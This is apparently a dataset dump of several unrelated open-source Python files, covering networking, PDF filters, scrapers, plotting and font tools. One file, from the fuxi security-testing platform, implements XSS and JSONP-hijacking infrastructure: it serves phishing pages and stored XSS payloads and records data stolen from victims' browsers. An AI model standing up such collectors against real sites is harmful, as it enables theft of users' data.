header = ofproto_v1_0.nxm_nx_reg(i)
offset += nxm_put(buf, offset, header, rule)
# Pad
pad_len = round_up(offset) - offset
ofproto_parser.msg_pack_into("%dx" % pad_len, buf, offset)
# The returned length, the match_len, does not include the pad
return offset - old_offset
def nxm_put(buf, offset, header, rule):
nxm = NXMatch(header)
len_ = nxm.put_header(buf, offset)
mf = mf_from_nxm_header(nxm.header)
return len_ + mf.put(buf, offset + len_, rule)
def round_up(length):
return (length + 7) / 8 * 8 # Round up to a multiple of 8
class NXMatch(object):
def __init__(self, header):
self.header = header
@classmethod
def parser(cls, buf, offset, match_len):
if match_len < 4:
raise exception.OFPMalformedMessage
(header,) = struct.unpack_from(ofproto_v1_0.NXM_HEADER_PACK_STRING,
buf, offset)
instance = cls(header)
payload_len = instance.length()
if payload_len == 0 or match_len < payload_len + 4:
raise exception.OFPMalformedMessage
return instance
def vendor(self):
return self.header >> 16
def field(self):
return (self.header >> 9) % 0x7f
def type(self):
return (self.header >> 9) % 0x7fffff
def hasmask(self):
return (self.header >> 8) & 1
def length(self):
return self.header & 0xff
def show(self):
return ('%08x (vendor=%x, field=%x, hasmask=%x len=%x)' %
(self.header, self.vendor(), self.field(),
self.hasmask(), self.length()))
def put_header(self, buf, offset):
ofproto_parser.msg_pack_into(ofproto_v1_0.NXM_HEADER_PACK_STRING,
buf, offset, self.header)
return struct.calcsize(ofproto_v1_0.NXM_HEADER_PACK_STRING)
|
fuxi/web/views/blue_view.py
|
cocobear/fuxi
| 731 |
67513
|
<filename>fuxi/web/views/blue_view.py<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 2019/1/21
# @File : blue_views.py
# @Desc : ""
from fuxi.web.flask_app import flask_app
from flask import jsonify
from flask import request, Blueprint, render_template
from fuxi.core.data.response import Response, StatusCode
from fuxi.common.utils.logger import logger
from fuxi.core.databases.orm.exploit.jsonp_orm import DBExploitJsonpTask
from fuxi.core.databases.orm.exploit.http_log_orm import DBHttpRequestLog
from fuxi.core.databases.orm.exploit.xss_orm import DBXssTasks, DBXssResult
blue_view = Blueprint('blue_views', __name__)
@blue_view.route('/')
def index():
return render_template('index.html')
@blue_view.route('/favicon.ico')
def favicon():
return ""
@flask_app.errorhandler(404)
def handle_404_error(e):
"""
:param e: 404 error msg
:return:
"""
if flask_app.config.get("DEBUG"):
return jsonify(Response.failed(StatusCode.NOT_FOUND, message=e))
else:
return jsonify(Response.failed(StatusCode.NOT_FOUND))
@flask_app.errorhandler(500)
def handle_all_error(e):
"""
:param e: unknown error msg
:return:
"""
if flask_app.config.get("DEBUG"):
return jsonify(Response.failed(StatusCode.SERVER_ERROR, message=e))
else:
return jsonify(Response.failed(StatusCode.SERVER_ERROR))
@blue_view.route('/jsonp/<sid>', methods=['GET'])
def phishing(sid):
try:
item = DBExploitJsonpTask.get_detail_by_short_id(sid)
if item:
return item['html']
else:
return "Not Found HTML"
except Exception as e:
logger.warning("get jsonp hijacking page failed: {} {}".format(sid, e))
return "Not Found HTML"
@blue_view.route('/http', methods=['GET'])
def http_log():
if request.method == 'GET':
try:
data = request.args.get("data", default=None)
verify = request.args.get("verify", default=None)
if data:
ip = request.remote_addr if request.remote_addr else '0.0.0.0'
referrer = request.referrer if request.referrer else '-'
hid = DBHttpRequestLog.add(ip, referrer, data)
return jsonify({"status": "success", "data": str(hid)})
elif verify:
if DBHttpRequestLog.verify(verify):
return jsonify({"result": True})
else:
return jsonify({"result": False})
else:
return jsonify({"status": "failed", "data": ""})
except Exception as e:
logger.warning("receive http request log failed: {}".format(e))
return jsonify({"status": "failed", "data": ""})
@blue_view.route('/x/<path>', methods=['GET'])
def get_xss_payload(path):
try:
project_item = DBXssTasks.get_detail_by_salt(path[:5])
if project_item:
return "{}".format(project_item['payload'])
else:
return "Not Found"
except Exception as e:
msg = "get xss payload: {}".format(e)
logger.warning(msg)
return Response.failed(message=msg)
@blue_view.route('/xss', methods=['GET'])
def get_xss_data():
try:
salt = request.args.get('salt')
data = request.args.get('data')
url = request.args.get('url')
client = request.remote_addr if request.remote_addr else '0.0.0.0'
referrer = request.referrer if request.referrer else '-'
extend = request.args.get('extend')
if salt:
item = DBXssTasks.get_detail_by_salt(salt)
if item:
DBXssResult.add(
item['_id'], salt, client=client, referrer=referrer,
url=url, data=data, extend=extend
)
return "Y"
else:
return "Missing Parameter: salt"
except Exception as e:
logger.warning("get xss data failed: {}".format(e))
return "x"
|
scripts/external_libs/scapy-2.4.5/scapy/layers/tuntap.py
|
dariusgrassi/trex-core
| 250 |
67518
|
<filename>scripts/external_libs/scapy-2.4.5/scapy/layers/tuntap.py
# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) <NAME> <<EMAIL>>
# Copyright (C) <NAME> <<EMAIL>>
# This program is published under a GPLv2 license
"""
Implementation of TUN/TAP interfaces.
These allow Scapy to act as the remote side of a virtual network interface.
"""
from __future__ import absolute_import
import os
import socket
import time
from fcntl import ioctl
from scapy.compat import raw, bytes_encode
from scapy.config import conf
from scapy.consts import BIG_ENDIAN, BSD, LINUX
from scapy.data import ETHER_TYPES, MTU
from scapy.error import warning, log_runtime
from scapy.fields import Field, FlagsField, StrFixedLenField, XShortEnumField
from scapy.layers.inet import IP
from scapy.layers.inet6 import IPv46, IPv6
from scapy.layers.l2 import Ether
from scapy.packet import Packet
from scapy.supersocket import SimpleSocket
import scapy.modules.six as six
# Linux-specific defines (/usr/include/linux/if_tun.h)
LINUX_TUNSETIFF = 0x400454ca
LINUX_IFF_TUN = 0x0001
LINUX_IFF_TAP = 0x0002
LINUX_IFF_NO_PI = 0x1000
LINUX_IFNAMSIZ = 16
class NativeShortField(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "@H")
class TunPacketInfo(Packet):
aliastypes = [Ether]
class LinuxTunIfReq(Packet):
"""
Structure to request a specific device name for a tun/tap
Linux ``struct ifreq``.
See linux/if.h (struct ifreq) and tuntap.txt for reference.
"""
fields_desc = [
# union ifr_ifrn
StrFixedLenField("ifrn_name", b"", 16),
# union ifr_ifru
NativeShortField("ifru_flags", 0),
]
class LinuxTunPacketInfo(TunPacketInfo):
"""
Base for TUN packets.
See linux/if_tun.h (struct tun_pi) for reference.
"""
fields_desc = [
# This is native byte order
FlagsField("flags", 0,
(lambda _: 16 if BIG_ENDIAN else -16),
["TUN_VNET_HDR"] +
["reserved%d" % x for x in range(1, 16)]),
# This is always network byte order
XShortEnumField("type", 0x9000, ETHER_TYPES),
]
class TunTapInterface(SimpleSocket):
"""
A socket to act as the host's peer of a tun / tap interface.
This implements kernel interfaces for tun and tap devices.
:param iface: The name of the interface to use, eg: 'tun0'
:param mode_tun: If True, create as TUN interface (layer 3).
If False, creates a TAP interface (layer 2).
If not supplied, attempts to detect from the ``iface``
name.
:type mode_tun: bool
:param strip_packet_info: If True (default), strips any TunPacketInfo from
the packet. If False, leaves it in tact. Some
operating systems and tunnel types don't include
this sort of data.
:type strip_packet_info: bool
FreeBSD references:
* tap(4): https://www.freebsd.org/cgi/man.cgi?query=tap&sektion=4
* tun(4): https://www.freebsd.org/cgi/man.cgi?query=tun&sektion=4
Linux references:
* https://www.kernel.org/doc/Documentation/networking/tuntap.txt
"""
desc = "Act as the host's peer of a tun / tap interface"
def __init__(self, iface=None, mode_tun=None, default_read_size=MTU,
strip_packet_info=True, *args, **kwargs):
self.iface = bytes_encode(conf.iface if iface is None else iface)
self.mode_tun = mode_tun
if self.mode_tun is None:
if self.iface.startswith(b"tun"):
self.mode_tun = True
elif self.iface.startswith(b"tap"):
self.mode_tun = False
else:
raise ValueError(
"Could not determine interface type for %r; set "
"`mode_tun` explicitly." % (self.iface,))
self.strip_packet_info = bool(strip_packet_info)
# This is non-zero when there is some kernel-specific packet info.
# We add this to any MTU value passed to recv(), and use it to
# remove leading bytes when strip_packet_info=True.
self.mtu_overhead = 0
# The TUN packet specification sends raw IP at us, and doesn't specify
# which version.
self.kernel_packet_class = IPv46 if self.mode_tun else Ether
if LINUX:
devname = b"/dev/net/tun"
# Having an EtherType always helps on Linux, then we don't need
# to use auto-detection of IP version.
if self.mode_tun:
self.kernel_packet_class = LinuxTunPacketInfo
self.mtu_overhead = 4 # len(LinuxTunPacketInfo)
else:
warning("tap devices on Linux do not include packet info!")
self.strip_packet_info = True
if len(self.iface) > LINUX_IFNAMSIZ:
warning("Linux interface names are limited to %d bytes, "
"truncating!" % (LINUX_IFNAMSIZ,))
self.iface = self.iface[:LINUX_IFNAMSIZ]
elif BSD: # also DARWIN
if not (self.iface.startswith(b"tap") or
self.iface.startswith(b"tun")):
raise ValueError("Interface names must start with `tun` or "
"`tap` on BSD and Darwin")
devname = b"/dev/" + self.iface
if not self.strip_packet_info:
warning("tun/tap devices on BSD and Darwin never include "
"packet info!")
self.strip_packet_info = True
else:
raise NotImplementedError("TunTapInterface is not supported on "
"this platform!")
sock = open(devname, "r+b", buffering=0)
if LINUX:
if self.mode_tun:
flags = LINUX_IFF_TUN
else:
# Linux can send us LinuxTunPacketInfo for TAP interfaces, but
# the kernel sends the wrong information!
#
# Instead of type=1 (Ether), it sends that of the payload
# (eg: 0x800 for IPv4 or 0x86dd for IPv6).
#
# tap interfaces always send Ether frames, which include a
# type parameter for the IPv4/v6/etc. payload, so we set
# IFF_NO_PI.
flags = LINUX_IFF_TAP | LINUX_IFF_NO_PI
tsetiff = raw(LinuxTunIfReq(
ifrn_name=bytes_encode(self.iface),
ifru_flags=flags))
ioctl(sock, LINUX_TUNSETIFF, tsetiff)
self.closed = False
self.default_read_size = default_read_size
super(TunTapInterface, self).__init__(sock)
def __call__(self, *arg, **karg):
"""Needed when using an instantiated TunTapInterface object for
conf.L2listen, conf.L2socket or conf.L3socket.
"""
return self
def recv_raw(self, x=None):
if x is None:
x = self.default_read_size
x += self.mtu_overhead
if six.PY2:
# For some mystical reason, using self.ins.read ignores
# buffering=0 on python 2.7 and blocks ?!
dat = os.read(self.ins.fileno(), x)
else:
dat = self.ins.read(x)
r = self.kernel_packet_class, dat, time.time()
if self.mtu_overhead > 0 and self.strip_packet_info:
# Get the packed class of the payload, without triggering a full
# decode of the payload data.
cls = r[0](r[1][:self.mtu_overhead]).guess_payload_class(b'')
# Return the payload data only
return cls, r[1][self.mtu_overhead:], r[2]
else:
return r
def send(self, x):
if hasattr(x, "sent_time"):
x.sent_time = time.time()
if self.kernel_packet_class == IPv46:
# IPv46 is an auto-detection wrapper; we should just push through
# packets normally if we got IP or IPv6.
if not isinstance(x, (IP, IPv6)):
x = IP() / x
elif not isinstance(x, self.kernel_packet_class):
x = self.kernel_packet_class() / x
sx = raw(x)
try:
self.outs.write(sx)
self.outs.flush()
except socket.error:
log_runtime.error("%s send",
self.__class__.__name__, exc_info=True)
|
angr/analyses/class_identifier.py
|
matthewpruett/angr
| 6,132 |
67533
|
<filename>angr/analyses/class_identifier.py
from ..sim_type import SimCppClass, SimTypeCppFunction
from ..analyses import AnalysesHub
from . import Analysis
class ClassIdentifier(Analysis):
"""
This is a class identifier for non stripped or partially stripped binaries, it identifies classes based on the
demangled function names, and also assigns functions to their respective classes based on their names. It also uses
the results from the VtableFinder analysis to assign the corresponding vtable to the classes.
self.classes contains a mapping between class names and SimCppClass objects
e.g. A::tool() and A::qux() belong to the class A
"""
def __init__(self):
if "CFGFast" not in self.project.kb.cfgs:
self.project.analyses.CFGFast(cross_references=True)
self.classes = {}
vtable_analysis = self.project.analyses.VtableFinder()
self.vtables_list = vtable_analysis.vtables_list
self._analyze()
def _analyze(self):
# Assigning function to classes
for func in self.project.kb.functions.values():
if func.is_plt:
continue
col_ind = func.demangled_name.rfind("::")
class_name = func.demangled_name[:col_ind]
if class_name.startswith("non-virtual thunk for "):
class_name = class_name[len("non-virtual thunk for ") :]
if col_ind != -1:
if class_name not in self.classes:
ctor = False
if func.demangled_name.find("{ctor}"):
ctor = True
function_members = {
func.addr: SimTypeCppFunction(
[], None, label=func.demangled_name, ctor=ctor
)
}
new_class = SimCppClass(
name=class_name, function_members=function_members
)
self.classes[class_name] = new_class
else:
ctor = False
if func.demangled_name.find("{ctor}"):
ctor = True
cur_class = self.classes[class_name]
cur_class.function_members[func.addr] = SimTypeCppFunction(
[], None, label=func.demangled_name, ctor=ctor
)
# Assigning a vtable to a class
for vtable in self.vtables_list:
for ref in self.project.kb.xrefs.xrefs_by_dst[vtable.vaddr]:
vtable_calling_func = self.project.kb.functions.floor_func(ref.ins_addr)
tmp_col_ind = vtable_calling_func.demangled_name.rfind("::")
possible_constructor_class_name = vtable_calling_func.demangled_name[
:tmp_col_ind
]
if (
"ctor" in vtable_calling_func.demangled_name
and possible_constructor_class_name in self.classes
):
self.classes[possible_constructor_class_name].vtable_ptrs.append(
vtable.vaddr
)
AnalysesHub.register_default("ClassIdentifier", ClassIdentifier)
|
subadmin/templatetags/subadmin_tags.py
|
inueni/django-subadmin
| 133 |
67542
|
from django.urls import reverse
from django.contrib.admin.templatetags.admin_modify import submit_row
from django.utils.encoding import force_text
from django.template import Library
register = Library()
@register.inclusion_tag('subadmin/breadcrumbs.html', takes_context=True)
def subadmin_breadcrumbs(context):
request = context['request']
opts = context['opts']
root = {
'name': request.subadmin.root['object']._meta.app_config.verbose_name,
'url': reverse('admin:app_list', kwargs={'app_label': request.subadmin.root['object']._meta.app_label})
}
breadcrumbs =[]
view_args = list(request.subadmin.view_args)
i = 0
subadmin_parents = request.subadmin.parents[::-1]
for parent in subadmin_parents:
adm = parent['admin']
obj = parent['object']
breadcrumbs.extend([{
'name': obj._meta.verbose_name_plural,
'url': adm.reverse_url('changelist', *view_args[:i]),
'has_change_permission': adm.has_change_permission(request),
}, {
'name': force_text(obj),
'url': adm.reverse_url('change', *view_args[:i + 1]),
'has_change_permission': adm.has_change_permission(request, obj),
}])
i += 1
return {
'root': root,
'breadcrumbs': breadcrumbs,
'opts': opts,
}
@register.simple_tag(takes_context=True)
def subadmin_url(context, viewname, *args, **kwargs):
subadmin = context['request'].subadmin
view_args = subadmin.base_url_args[:-1] if subadmin.object_id else subadmin.base_url_args
return reverse('admin:%s_%s' % (subadmin.base_viewname, viewname), args=view_args + list(args), kwargs=kwargs)
@register.inclusion_tag('subadmin/submit_line.html', takes_context=True)
def subadmin_submit_row(context):
ctx = submit_row(context)
ctx.update({
'request': context['request']
})
return ctx
|
tests/test_chi_library.py
|
joshagoldstein/city-scrapers
| 255 |
67572
|
from datetime import datetime
from os.path import dirname, join
from unittest.mock import MagicMock
import pytest
from city_scrapers_core.constants import BOARD, TENTATIVE
from city_scrapers_core.utils import file_response
from freezegun import freeze_time
from city_scrapers.spiders.chi_library import ChiLibrarySpider
freezer = freeze_time("2018-12-20")
freezer.start()
session = MagicMock()
res_mock = MagicMock()
res_mock.status_code = 200
session.get.return_value = res_mock
test_response = file_response(
join(dirname(__file__), "files", "chi_library.html"),
url="https://www.chipublib.org/board-of-directors/board-meeting-schedule/",
)
spider = ChiLibrarySpider(session=session)
parsed_items = [item for item in spider.parse(test_response)]
freezer.stop()
def test_title():
assert parsed_items[0]["title"] == "Board of Directors"
def test_description():
assert parsed_items[0]["description"] == ""
def test_start():
assert parsed_items[0]["start"] == datetime(2021, 1, 26, 9)
def test_id():
assert parsed_items[0]["id"] == "chi_library/202101260900/x/board_of_directors"
def test_status():
assert parsed_items[0]["status"] == TENTATIVE
def test_all_day():
assert parsed_items[0]["all_day"] is False
def test_location():
assert parsed_items[0]["location"] == {
"address": "",
"name": "Virtual",
}
def test_links():
assert parsed_items[0]["links"] == [
{
"href": "https://www.chipublib.org/news/board-of-directors-meeting-agenda-january-26-2021/", # noqa
"title": "Agenda",
},
{
"href": "https://www.chipublib.org/news/board-of-directors-meeting-minutes-january-26-2021/", # noqa
"title": "Minutes",
},
]
@pytest.mark.parametrize("item", parsed_items)
def test_classification(item):
assert item["classification"] == BOARD
@pytest.mark.parametrize("item", parsed_items)
def test_end(item):
assert item["end"] is None
@pytest.mark.parametrize("item", parsed_items)
def test_source(item):
assert (
item["source"]
== "https://www.chipublib.org/board-of-directors/board-meeting-schedule/"
)
|
ffcv/memory_managers/process_cache/page_reader.py
|
neuroailab/ffcv
| 1,969 |
67574
|
from threading import Thread
from queue import Queue
import numpy as np
from ...libffcv import read
class PageReader(Thread):
def __init__(self, fname:str, queries: Queue, loaded: Queue,
memory: np.ndarray):
self.fname: str = fname
self.queries: Queue = queries
self.memory: np.ndarray = memory
self.page_size = memory.shape[1]
self.loaded: Queue = loaded
super().__init__(daemon=True)
def run(self):
import hashlib
with open(self.fname, 'rb') as handle:
fileno = handle.fileno()
while True:
query = self.queries.get()
# No more work
if query is None:
break
page_number, slot = query
offset = np.uint64(page_number * self.page_size)
length = read(fileno, self.memory[slot], offset)
# print("L", page_number, slot, hashlib.md5(self.memory[slot]).hexdigest(), self.memory[slot].ctypes.data, length)
self.loaded.put(page_number)
|
pyhanko/pdf_utils/filters.py
|
peteris-zealid/pyHanko
| 161 |
67575
|
<reponame>peteris-zealid/pyHanko
"""
Implementation of stream filters for PDF.
Taken from PyPDF2 with modifications. See :ref:`here <pypdf2-license>`
for the original license of the PyPDF2 project.
Note that not all decoders specified in the standard are supported.
In particular ``/Crypt`` and ``/LZWDecode`` are missing.
"""
import binascii
import re
import struct
import zlib
from io import BytesIO
from .misc import PdfReadError, PdfStreamError, Singleton
__all__ = [
'Decoder', 'ASCII85Decode', 'ASCIIHexDecode', 'FlateDecode',
'get_generic_decoder'
]
decompress = zlib.decompress
compress = zlib.compress
class Decoder:
"""
General filter/decoder interface.
"""
def decode(self, data: bytes, decode_params: dict) -> bytes:
"""
Decode a stream.
:param data:
Data to decode.
:param decode_params:
Decoder parameters, sourced from the ``/DecoderParams`` entry
associated with this filter.
:return:
Decoded data.
"""
raise NotImplementedError
def encode(self, data: bytes, decode_params: dict) -> bytes:
"""
Encode a stream.
:param data:
Data to encode.
:param decode_params:
Encoder parameters, sourced from the ``/DecoderParams`` entry
associated with this filter.
:return:
Encoded data.
"""
raise NotImplementedError
def _png_decode(data: memoryview, columns):
output = BytesIO()
# PNG prediction can vary from row to row
rowlength = columns + 1
assert len(data) % rowlength == 0
prev_result = bytes(rowlength - 1)
for row in range(len(data) // rowlength):
rowdata = data[(row * rowlength):((row + 1) * rowlength)]
filter_byte = rowdata[0]
result_row = bytearray(rowlength - 1)
if filter_byte == 0:
pass
elif filter_byte == 1:
pairs = zip(rowdata[2:], rowdata[1:])
result_row[0] = rowdata[1]
for i, (x, y) in enumerate(pairs):
result_row[i + 1] = (x + y) % 256
elif filter_byte == 2:
pairs = zip(rowdata[1:], prev_result)
for i, (x, y) in enumerate(pairs):
result_row[i] = (x + y) % 256
else:
# unsupported PNG filter
raise PdfReadError(
"Unsupported PNG filter %r" % filter_byte
)
prev_result = result_row
output.write(result_row)
return output.getvalue()
class FlateDecode(Decoder, metaclass=Singleton):
"""
Implementation of the ``/FlateDecode`` filter.
.. warning::
Currently not all predictor values are supported. This may cause
problems when extracting image data from PDF files.
"""
def decode(self, data: bytes, decode_params):
# there's lots of slicing ahead, so let's reduce copying overhead
data = memoryview(decompress(data))
predictor = 1
if decode_params:
try:
predictor = decode_params.get("/Predictor", 1)
except AttributeError:
pass # usually an array with a null object was read
# predictor 1 == no predictor
if predictor == 1:
return data
columns = decode_params["/Columns"]
# PNG prediction:
if 10 <= predictor <= 15:
return _png_decode(data, columns)
else:
# unsupported predictor
raise PdfReadError(
"Unsupported flatedecode predictor %r" % predictor
)
def encode(self, data, decode_params=None):
# TODO support the parameters in the spec
return compress(data)
# TODO check boundary conditions in PDF spec
WS_REGEX = re.compile(b'\\s+')
ASCII_HEX_EOD_MARKER = b'>'
class ASCIIHexDecode(Decoder, metaclass=Singleton):
"""
Wrapper around :func:`binascii.hexlify` that implements the
:class:`.Decoder` interface.
"""
def encode(self, data: bytes, decode_params=None) -> bytes:
return binascii.hexlify(data) + b'>'
def decode(self, data, decode_params=None):
if isinstance(data, str):
data = data.encode('ascii')
data, _ = data.split(ASCII_HEX_EOD_MARKER, 1)
data = WS_REGEX.sub(b'', data)
return binascii.unhexlify(data)
# TODO reimplement LZW decoder
ASCII_85_EOD_MARKER = b'~>'
POWS = tuple(85 ** p for p in (4, 3, 2, 1, 0))
class ASCII85Decode(Decoder, metaclass=Singleton):
"""
Implementation of the base 85 encoding scheme specified in ISO 32000-1.
"""
def encode(self, data: bytes, decode_params=None) -> bytes:
# BytesIO is quite clever, in that it doesn't copy things until modified
data = BytesIO(data)
out = BytesIO()
while True:
grp = data.read(4)
if not grp:
break
# This needs to happen before applying padding!
# See § 7.4.3 in ISO 32000-1
if grp == b'\0\0\0\0':
out.write(b'z')
continue
bytes_read = len(grp)
if bytes_read < 4:
grp += b'\0' * (4 - bytes_read)
pows = POWS[:bytes_read + 1]
else:
pows = POWS
# write 5 chars in base85
grp_int, = struct.unpack('>L', grp)
for p in pows:
digit, grp_int = divmod(grp_int, p)
# use chars from 0x21 to 0x75
out.write(bytes((digit + 0x21,)))
out.write(ASCII_85_EOD_MARKER)
return out.getvalue()
def decode(self, data, decode_params=None):
if isinstance(data, str):
data = data.encode('ascii')
data, _ = data.split(ASCII_85_EOD_MARKER, 1)
data = BytesIO(WS_REGEX.sub(b'', data))
out = BytesIO()
while True:
next_char = data.read(1)
if not next_char:
break
if next_char == b'z':
out.write(b'\0\0\0\0')
continue
rest = data.read(4)
if not rest: # pragma: nocover
raise PdfStreamError(
'Nonzero ASCII85 group must have at least two digits.'
)
grp = next_char + rest
grp_result = 0
p = 0 # make the linter happy
# convert back from base 85 to int
for digit, p in zip(grp, POWS):
digit -= 0x21
if 0 <= digit < 85:
grp_result += p * digit
else: # pragma: nocover
raise PdfStreamError(
'Bytes in ASCII85 data must lie beteen 0x21 and 0x75.'
)
# 85 and 256 are coprime, so the last digit will always be off by
# one if we had to throw away a multiple of 256 in the encoding
# step (due to padding).
if len(grp) < 5:
grp_result += p
# Finally, pack the integer into a 4-byte unsigned int
# (potentially need to cut off some excess digits)
decoded = struct.pack('>L', grp_result)
out.write(decoded[:len(grp) - 1])
return out.getvalue()
class CryptFilterDecoder(Decoder):
def __init__(self, handler):
from .crypt import SecurityHandler
self.handler: SecurityHandler = handler
def decode(self, data: bytes, decode_params: dict) -> bytes:
from .crypt import IDENTITY
cf_name = decode_params.get('/Name', IDENTITY)
cf = self.handler.get_stream_filter(name=cf_name)
# the spec explicitly tells us to use the global key here, go figure
# (clause § 7.4.10 in both 32k-1 and 32k-2)
return cf.decrypt(cf.shared_key, data, params=decode_params)
def encode(self, data: bytes, decode_params: dict) -> bytes:
from .crypt import IDENTITY
cf_name = decode_params.get('/Name', IDENTITY)
cf = self.handler.get_stream_filter(name=cf_name)
return cf.encrypt(cf.shared_key, data, params=decode_params)
DECODERS = {
'/FlateDecode': FlateDecode, '/Fl': FlateDecode,
'/ASCIIHexDecode': ASCIIHexDecode, '/AHx': ASCIIHexDecode,
'/ASCII85Decode': ASCII85Decode, '/A85': ASCII85Decode,
}
def get_generic_decoder(name: str) -> Decoder:
"""
Instantiate a specific stream filter decoder type by (PDF) name.
The following names are recognised:
* ``/FlateDecode`` or ``/Fl`` for the decoder implementing Flate
compression.
* ``/ASCIIHexDecode`` or ``/AHx`` for the decoder that converts bytes to
their hexadecimal representations.
* ``/ASCII85Decode`` or ``/A85`` for the decoder that converts byte strings
to a base-85 textual representation.
.. warning::
``/Crypt`` is a special case because it requires access to the
document's security handler.
.. warning::
LZW compression is currently unsupported, as are most compression
methods that are used specifically for image data.
:param name:
Name of the decoder to instantiate.
"""
try:
cls = DECODERS[name]
except KeyError:
raise PdfStreamError(f"Stream filter '{name}' is not supported.")
return cls()
|
PytoTests/test_pyto.py
|
snazari/Pyto
| 701 |
67576
|
<gh_stars>100-1000
"""
Tests for Pyto before submitting to the App Store.
"""
import unittest
import runpy
import sys
import os
class TestPyto(unittest.TestCase):
def test_lib(self):
from Lib import (apps, location, mainthread, motion,
multipeer, music, notification_center, notifications,
pasteboard, photos, pyto_core, pyto_ui,
remote_notifications, sharing, sound, speech, userkeys,
xcallback)
def test_modules(self):
runpy.run_module("download_all")
def test_pip(self):
import pip
pip.main(["install", "sympy"])
import sympy
pip.main(["uninstall", "sympy"])
def test_command_runner(self):
expected_result = "usage: pip.py [-h] [--verbose] [-6]\n sub-command ...\npip.py: error: argument sub-command: invalid choice: '—-help' (choose from 'list', 'install', 'download', 'search', 'versions', 'uninstall', 'update')"
out_path = os.path.join(os.path.expanduser("~/tmp"), "out.txt")
out = open(out_path, "w+")
_out = sys.stdout
_err = sys.stderr
sys.stdout = out
sys.stderr = out
sys.argv = ["pyto", "pip", "—-help"]
runpy.run_module("command_runner")
sys.stdout = _out
sys.stderr = _err
out.close()
out = open(out_path, "r")
res = out.read()
out.close()
res = res.replace(" ", "")
res = res.replace("\n", "")
res = res.replace("\t", "")
expected_result = expected_result.replace(" ", "")
expected_result = expected_result.replace("\n", "")
expected_result = expected_result.replace("\t", "")
self.assertEqual(res, expected_result)
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
pass
|
vergeml/plots/roc.py
|
vergeml/VergeML
| 324 |
67582
|
<reponame>vergeml/VergeML
from vergeml.command import command, CommandPlugin
from vergeml.option import option
from vergeml.plots import load_labels
import os.path
import csv
from vergeml.utils import VergeMLError
import numpy as np
@command('roc', descr="Plot a ROC curve.")
@option('@AI')
@option('class', type='Optional[str]', descr="The class to plot.")
class ROCPlot(CommandPlugin):
def __call__(self, args, env):
# Plotting a ROC curve needs the model to follow the convention
# - labels.txt in checkpoints
# - predictions.csv in stats
from sklearn.metrics import roc_curve, auc
import matplotlib.pyplot as plt
from itertools import cycle
from scipy import interp
from vergeml.plots import load_labels, load_predictions
try:
labels = load_labels(env)
except FileNotFoundError:
raise VergeMLError("Can't plot ROC chart - not supported by model.")
if args['class'] and args['class'] not in labels:
raise VergeMLError("Unknown class: " + args['class'])
nclasses = len(labels)
lw = 2
try:
y_test, y_score = load_predictions(env, nclasses)
except FileNotFoundError:
raise VergeMLError("Can't plot ROC chart - not supported by model.")
# From:
# https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc.html
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(nclasses):
fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(y_test.ravel(), y_score.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
if args['class']:
ix = labels.index(args['class'])
plt.figure()
plt.plot(fpr[ix], tpr[ix], color='darkorange',
lw=lw, label='ROC curve of class {0} (area = {1:0.4f})'.format(args['class'], roc_auc[ix]))
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve for @' + args['@AI'])
plt.legend(loc="lower right")
plt.show()
else:
# Compute macro-average ROC curve and ROC area
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(nclasses)]))
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(nclasses):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= nclasses
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure()
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.4f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.4f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue', 'maroon', 'indigo'])
for i, color in zip(range(nclasses), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.4f})'
''.format(labels[i], roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve for @' + args['@AI'])
plt.legend(loc="lower right")
plt.show()
|
Kerning/KernCrash Current Glyph.py
|
jpt/Glyphs-Scripts
| 283 |
67612
|
<reponame>jpt/Glyphs-Scripts<filename>Kerning/KernCrash Current Glyph.py
#MenuTitle: KernCrash Current Glyph
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__="""
Opens a new tab containing kerning combos with the current glyph that collide in the current fontmaster.
"""
from AppKit import NSNotFound, NSAffineTransform
from kernanalysis import effectiveKerning
exceptions="""
.notdef
Ldot ldot ldot.sc
Jacute jacute jacute.sc
periodcentered.loclCAT periodcentered.loclCAT.case periodcentered.loclCAT.sc
currency
emptyset
infinity
integral
product
summation
radical
partialdiff
lozenge
paragraph
asciicircum
"""
# def effectiveKerning( leftGlyphName, rightGlyphName, thisFont, thisFontMasterID):
# leftLayer = thisFont.glyphs[leftGlyphName].layers[thisFontMasterID]
# rightLayer = thisFont.glyphs[rightGlyphName].layers[thisFontMasterID]
# if Glyphs.versionNumber < 3:
# effectiveKerning = leftLayer.rightKerningForLayer_( rightLayer )
# else:
# effectiveKerning = leftLayer.nextKerningForLayer_direction_(rightLayer, leftLayer.parent.direction)
# if effectiveKerning < NSNotFound:
